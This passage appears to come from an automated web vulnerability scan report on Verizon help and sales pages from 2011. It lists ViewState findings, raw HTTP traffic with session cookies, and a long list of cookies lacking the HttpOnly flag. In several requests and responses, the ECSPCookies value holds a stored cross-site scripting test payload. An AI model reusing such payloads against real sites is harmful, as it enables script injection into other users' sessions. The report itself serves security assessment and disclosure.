Host:	http://www22.verizon.com
Path:	/ResidentialHelp/eRepairSigninPopup.aspx

Request

GET /ResidentialHelp/eRepairSigninPopup.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 5573
Expires: Mon, 05 Sep 2011 22:37:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:37:23 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
<HEAD>
       <title>eRepairSigninPopup</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNTI4NTAxODExZGQ=" />
...[SNIP]...

9.2. http://www22.verizon.com/ResidentialHelp/iHAPopup/125612.htm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/ResidentialHelp/iHAPopup/125612.htm

Request

GET /ResidentialHelp/iHAPopup/125612.htm HTTP/1.1
Host: www22.verizon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/residentialhelp/fiostv
Cookie: __switchTo5x=51; __unam=49dc76-1323a4a13fb-1bbb4ff9-1; ASP.NET_SessionId=ncxmtseom3hg3h4542cc0c55; GlobalSessionID=NEScwnwaL4QccG18LnT8IJ7HQ%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:13:38 PM; AkaUTrackingID=804E8C682B3FA4D861FA571CC854E9FD; AkaSTrackingID=22240856919E5F4D120128A4C01974E7; V347=3JqCYcsE1rlAhTfmCIUyRZ-iggeiohK6a-FKkJ_aMvvIaMkdz3Ks80g; CP=null*; refURL=http://www22.verizon.com/residentialhelp/fiostv; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ca45525d5f4f58455e445a4a423660; Product=A; ProductXML=A; canigetfios=Y; showpromo=N; BusinessUnit=wireless; XPID=BO-00000000521444319_%20%7C%20HSIPOE_2; ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>prompt("StoredXSS")</script>af81f92fd39; ContextInfo_TV=FiOSTV; IHAClientIP=112.64.2.103; CMS_TimeZoneOffset=300; RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Mon, 05 Sep 2011 22:29:57 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 10485
Expires: Mon, 05 Sep 2011 22:29:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:29:57 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML xmlns:vz>
<HEAD id="head"><title>

</title><meta name="GENERATOR" content="Microsoft Visual Studio 7.0" /><meta name="CODE
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTQ1NzE0NzcwNw9kFgICAQ9kFghmD2QWAmYPEGRkFgBkAgMPZBYCZg9kFgJmDw8WAh4EVGV4dAXJBjxESVYgaWQ9Ymdfd3JhcHBlcj48RElWIGNsYXNzPWNvbnRlbnRfd3JhcHBlcj48SDE+VHJ5IHRoZSBJbi1Ib21lIEFnZW50PC9IMT48SDM+SGF2ZSBpdD8gVXNlIGl0ITwvSDM+PEgzPk5lZWQgaXQ/IEdldCBpdCE8L0gzPjxQIGNsYXNzPWJsZGNvbnRlbnQ+RmFzdCwgZWFzeSAyNC83IHNvbHV0aW9ucy0gcmlnaHQgb24geW91ciBkZXNrdG9wLjwvUD48RElWIGNsYXNzPWN0YV9wcmltYXJ5PjxESVY+PERJVj48QSBpZD1idG5HZXRJbkhvbWVBZ2VudFBvcHVwIGhyZWY9Imh0dHBzOi8vd3d3MjIudmVyaXpvbi5jb20vRm9yWW91ckhvbWUvRlRUUFJlcGFpci9OUi9jb21tb24vQ29uc3VtZXJXaXphcmQvVnpJbkhvbWVBZ2VudEluc3RhbGxlci5tc2k/Q01QPUVNQy1DT05TMDkwMDgiIG5hbWU9JmFtcDtsaWQ9YnRuR2V0SW5Ib21lQWdlbnRQb3B1cD5HZXQgSW4tSG9tZSBBZ2VudDwvQT48L0RJVj48L0RJVj48L0RJVj48RElWIGNsYXNzPWNsZWFyPjwvRElWPjwvRElWPjxESVYgc3R5bGU9IlBPU0lUSU9OOiBhYnNvbHV0ZTsgQk9UVE9NOiA1cHg7IExFRlQ6IDIycHgiPjxESVYgc3R5bGU9Ik1BUkdJTi1MRUZUOiA1cHgiIGNsYXNzPWN0YV9wcmltYXJ5PjxESVY+PERJVj48QSBpZD1idG5MZWFybk1vcmVQb3B1cCBvbmNsaWNrPSJqYXZhc2NyaXB0OndpbmRvdy5vcGVuKCdodHRwOi8vd3d3MjIudmVyaXpvbi5jb20vcmVzaWRlbnRpYWxoZWxwL2luaG9tZWFnZW50P0NNUD1FTUMtQ09OUzA5MDA4JykiIGhyZWY9ImphdmFzY3JpcHQ6dm9pZCgwKTsiIG5hbWU9JmFtcDtsaWQ9YnRuTGVhcm5Nb3JlUG9wdXA+TGVhcm4gTW9yZTwvQT48L0RJVj48L0RJVj48L0RJVj48L0RJVj48L0RJVj5kZAIED2QWAmYPZBYCZg8PFgIfAGVkZAIFD2QWBGYPFgIeB1Zpc2libGVoZAICDxYCHwFoZGQ=" />
...[SNIP]...

9.3. http://www22.verizon.com/ResidentialHelp/templates/layers/setpreferences_generic.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/ResidentialHelp/templates/layers/setpreferences_generic.aspx

Request

GET /ResidentialHelp/templates/layers/setpreferences_generic.aspx?TabValue=TV HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; CMS_TimeZoneOffset=300; CP=null*; refURL=http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm; RecentlyVisited=Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 8339
Expires: Mon, 05 Sep 2011 22:24:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:24:23 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title class="inf
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJOTA4NjkzMTc0D2QWAmYPZBYEZg8WAh4HVmlzaWJsZWgWAgIBDxBkZBYAZAICDxYCHwBoZGQ=" />
...[SNIP]...

9.4. http://www22.verizon.com/residentialhelp/Templates/layers/setpreferences.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residentialhelp/Templates/layers/setpreferences.aspx

Request

GET /residentialhelp/Templates/layers/setpreferences.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 11732
Expires: Mon, 05 Sep 2011 22:37:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:37:19 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<title>My Preferences</title>
<link rel="stylesheet" type="text/css" href="/r
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNzkzMzg3OTk3ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCgUKcmRvU3VwcG9ydAUKcmRvU3VwcG9ydAULcmRvSW50ZXJuZXQFC3Jkb0ludGVybmV0BQVyZG9UVgUFcmRvVFYFCHJkb1Bob25lBQhyZG9QaG9uZQULcmRvV2lyZWxlc3MFC3Jkb1dpcmVsZXNz" />
...[SNIP]...

9.5. http://www22.verizon.com/residentialhelp/globalfooterhelp.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residentialhelp/globalfooterhelp.aspx

Request

GET /residentialhelp/globalfooterhelp.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 3653
Expires: Mon, 05 Sep 2011 22:37:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:37:23 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Footer
</t
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTY4MzY2NzM3MmRk" />
...[SNIP]...

9.6. http://www22.verizon.com/residentialhelp/globalheaderhelp.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residentialhelp/globalheaderhelp.aspx

Request

GET /residentialhelp/globalheaderhelp.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 373312
Expires: Mon, 05 Sep 2011 22:37:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:37:21 GMT
Connection: close

<headtags><script language='javascript'>var GlobalHeaderId='GlobalHeader';</script>
<script>var masterClientID ='GlobalHeader';</script>
<script language='javascript' src='/content/commonfiles/include
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTMzOTk0NjYxMGRk" />
...[SNIP]...

9.7. http://www22.verizon.com/residentialhelp/inhomeagent previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residentialhelp/inhomeagent

Request

GET /residentialhelp/inhomeagent HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 215655
Expires: Mon, 05 Sep 2011 22:37:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:37:25 GMT
Connection: close
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=InHomeAgent&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>prompt("StoredXSS")</script>af81f92fd39; expires=Wed, 05-Sep-2012 22:37:25 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/l
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTQ4MTQ2OTAzNGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFN2N0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkVmlld2FibGVQcmlvcml0eTEkY2hrVmlld2FibGUFOWN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkVmlld2FibGVQcmlvcml0eTEkY2hrU2VhcmNoYWJsZQ==" />
...[SNIP]...

9.8. http://www22.verizon.com/residentialhelp/inhomeagent/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residentialhelp/inhomeagent/

Request

GET /residentialhelp/inhomeagent/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 215661
Expires: Mon, 05 Sep 2011 22:37:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:37:25 GMT
Connection: close
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=InHomeAgent&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>prompt("StoredXSS")</script>af81f92fd39; expires=Wed, 05-Sep-2012 22:37:25 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/l
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTQ4MTQ2OTAzNGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFN2N0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkVmlld2FibGVQcmlvcml0eTEkY2hrVmlld2FibGUFOWN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkVmlld2FibGVQcmlvcml0eTEkY2hrU2VhcmNoYWJsZQ==" />
...[SNIP]...

9.9. http://www22.verizon.com/residentialhelp/usercontrols/SendEmail.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residentialhelp/usercontrols/SendEmail.aspx

Request

GET /residentialhelp/usercontrols/SendEmail.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 16625
Expires: Mon, 05 Sep 2011 22:37:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:37:23 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html xmlns:vz>
   <head>
       <title>Send Email</title>
       <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE3MjE1ODM2OTcPZBYCAgEPZBYCAgMPZBYCAgEPZBYCAgEPEGRkFgBkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYDBQxjaGtFbWFpbENvcHkFCGJ0blNlbmQyBQdidG5TZW5kBQ5JbWFnZVZlcmlmaWVyMQ8PZAUYbmN4bXRzZW9tM2hnM2g0NTQyY2MwYzU1ZA==" />
...[SNIP]...

9.10. https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX

Request

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 54820
Expires: Mon, 05 Sep 2011 22:25:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:25:39 GMT
Connection: keep-alive
Set-Cookie: GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; domain=.verizon.com; path=/
Set-Cookie: SrcClientID=smallbusiness.verizon.com; path=/; secure; HttpOnly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Verizon | Shop for Services | TV + Internet + Phone</title>

...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTYyMDA0NDM3NGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgQFCldpbmJhY2tfQ0IFDWltZ05leHRCdXR0b24FCUNoZWNrYm94MQUFYWZidG4=" />
...[SNIP]...

9.11. https://www22.verizon.com/ForYourHome/GoFlow/MyVerizonNew/ACSLogin.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/ForYourHome/GoFlow/MyVerizonNew/ACSLogin.aspx

Request

GET /ForYourHome/GoFlow/MyVerizonNew/ACSLogin.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10. Cookie without HttpOnly flag set previous next
There are 152 instances of this issue:

http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal707d3(a)c76e008a5a1/smb
http://community.adobe.com/help/rm/sugg.html
https://login.verizonwireless.com/amserver/saml2/jsp/idpSSOInit.jsp
http://sales.liveperson.net/visitor/addons/deploy.asp
http://sales.liveperson.net/visitor/addons/deploy.asp
http://sales.liveperson.net/visitor/addons/deploy.asp
https://secure.opinionlab.com/ccc01/comment_card_json_4_0_b.asp
http://www.verizonwireless.com/b2c/index.html
http://www22.verizon.com/content/verizonglobalhome/gpromo.aspx
https://www22.verizon.com/content/verizonglobalhome/gpromo.aspx
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/409.178.tk.88x31/0.10282370378263295
http://ad.yieldmanager.com/pixel
https://adwords.google.com/um/StartNewLogin
http://ak1.abmr.net/is/cache.vzw.com
http://ak1.abmr.net/is/www22.verizon.com
https://auth.verizon.com/amserver/UI/Login
https://auth.verizon.net/amserver/UI/Login
http://cache.vzw.com/globalnav/images/nav_bg_sprite.gif
http://community.adobe.com/help/about.html
http://content.atomz.com/pb00002f7b/publish/includes/css/marquee.css
http://d.agkn.com/pixel!t=932!
http://d.mediabrandsww.com/r/dd/id/L21rdC8zL2NpZC8xMDU5NDA0L3QvMg/qry/
http://developer.verizon.com/favicon.ico
http://developer.verizon.com/jsps/devCenters/Smart_Phone/Landing_Pages/AppendixICategoryDefinitions.jsp
http://download.verizon.net/surround/media/misc/images/vidplayer_black_530x272.jpg
http://ehg-verizon.hitbox.com/HG
http://ehg-verizon.hitbox.com/HG
http://ehg-verizon.hitbox.com/HG
http://ehg-verizon.hitbox.com/HG
http://ehg-verizon.hitbox.com/HG
http://ehg-verizon.hitbox.com/HG
http://ehg-verizon.hitbox.com/HG
http://ehg-verizon.hitbox.com/HG
http://ehg-verizon.hitbox.com/HG
http://ehg-verizon.hitbox.com/HGct
https://enterprisecenter.verizon.com/enterprisesolutions/Repairs/iRepairs/Images/systemBusy.gif
https://enterprisecenter.verizon.com/enterprisesolutions/global/gHome.do
https://enterprisecenter.verizon.com/enterprisesolutions/selfreg/javascript/selfreg.js
https://enterprisecenter.verizon.com/enterprisesolutions/selfreg/submitEnrollmentProfileInfo.do
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_VEC_Main.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_VEC_Popup.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_Vz_Main.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_Vz_Popup.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_1px.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_left.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_right.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_gradient.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/btn_Forms.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/btn_close.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_default_left.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_default_right.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_left.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_right.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/dropdownMenu.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/footer_1px.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_gray_left.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_gray_right.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_red_left.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_red_right.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/pattern_library/i/s.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/icn_HelpLarge.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/icn_errorMssg.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/icn_video.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/s.gif
https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/tooltip_button.gif
https://enterprisecenter.verizon.com/favicon.ico
http://forums.verizon.com/t5/FiOS-Internet/Need-webmail-contacts-CSV-titles/td-p/23248
http://g-pixel.invitemedia.com/gmatcher
http://get.adobe.com/cfusion/search/buddy/searchbuddy.cfm
http://get.adobe.com/flashplayer/
http://headlines.verizon.com/headlines/js/com/bea/portal/tools/js/Core.jsp
http://headlines.verizon.com/headlines/js/com/bea/portal/tools/js/javascriptConstants.jsp
http://idcs.interclick.com/Segment.aspx
http://leadback.advertising.com/adcedge/lb
http://leadback.advertising.com/adcedge/lb
https://mblogin.verizonwireless.com/amserver/UI/Login
http://media.verizon.com/media/XmlProxy.ashx
http://media.verizon.com/media/scripts/widget.ashx
http://pixel.mathtag.com/event/img
http://r.turn.com/r/beacon
http://s.xp1.ru4.com/click
http://s.xp1.ru4.com/meta
http://s.xp1.ru4.com/meta
http://sales.liveperson.net/hc/2329305/
http://sales.liveperson.net/hc/2329305/
http://sales.liveperson.net/hc/2329305/
http://sales.liveperson.net/hc/2329305/cmd/url/
http://sales.liveperson.net/hc/44153975/
http://sales.liveperson.net/hc/44153975/
http://search.verizon.com/favicon.ico
http://servedby.flashtalking.com/segment/modify/adg
https://signin.verizon.com/sso/VOLPortalLogin
http://statse.webtrendslive.com/dcsi8dupuerp17vzhd59b2lwc_8u5u/dcs.gif
http://statse.webtrendslive.com/dcspfpx81frp17vzhd59b2lwc_3u6z/dcs.gif
http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx
http://syndicate.verizon.net/ads/regionlocator.ashx
http://tags.bluekai.com/site/4357
http://tap.tapad.com/audience/pxl.png
http://webmail.verizon.com/signin/
http://webmail.verizon.net/signin/
http://webmail.verizon.net/signin/Login.jsp
http://whitefence.112.2o7.net/b/ss/pcwhitefencecom/1/H.21/s53773487436119
http://whitefence.112.2o7.net/b/ss/pcwhitefencecom/1/H.21/s59195406346116
http://www.darkreading.com/security/attacks/showArticle.jhtml
http://www.facebook.com/dialog/feed
http://www.verizonbusiness.com/Medium/
http://www.verizonbusiness.com/Medium/about/promotions/first_6_months/
http://www.verizonbusiness.com/Medium/about/promotions/premium_data_center/
http://www.verizonbusiness.com/Medium/about/promotions/smp/
http://www.verizonbusiness.com/Medium/bundles/vsbb/
http://www.verizonbusiness.com/Medium/products/conferencing/
http://www.verizonbusiness.com/Medium/products/internet/ida/
http://www.verizonbusiness.com/Medium/products/itinfrastructure/computing/caas_smb/video/
http://www.verizonbusiness.com/Medium/products/managed/managed_mobility/
http://www.verizonbusiness.com/Medium/sign-in/vec/
http://www.verizonbusiness.com/about/ipinnovation/
http://www.verizonbusiness.com/us/Products/networking/internet/ipv6/
http://www.verizonwireless.com/b2c/store/controller
http://www.verizonwireless.com/b2c/vzwfly
http://www.youtube.com/results
http://www22.verizon.com/ResidentialHelp/FiOSTV/Guide/Enhanced+TV/QuestionsOne/124941.htm
http://www22.verizon.com/ResidentialHelp/templates/layers/setpreferences_generic.aspx
http://www22.verizon.com/content/ContactUs/
http://www22.verizon.com/content/commontemplates/validlogin.aspx
http://www22.verizon.com/content/verizonglobalhome/Intermediate.aspx
http://www22.verizon.com/content/verizonglobalhome/setValues.aspx
http://www22.verizon.com/onecms/vzcareers/ak-cached/4h/includes/javascript/globalalert.js
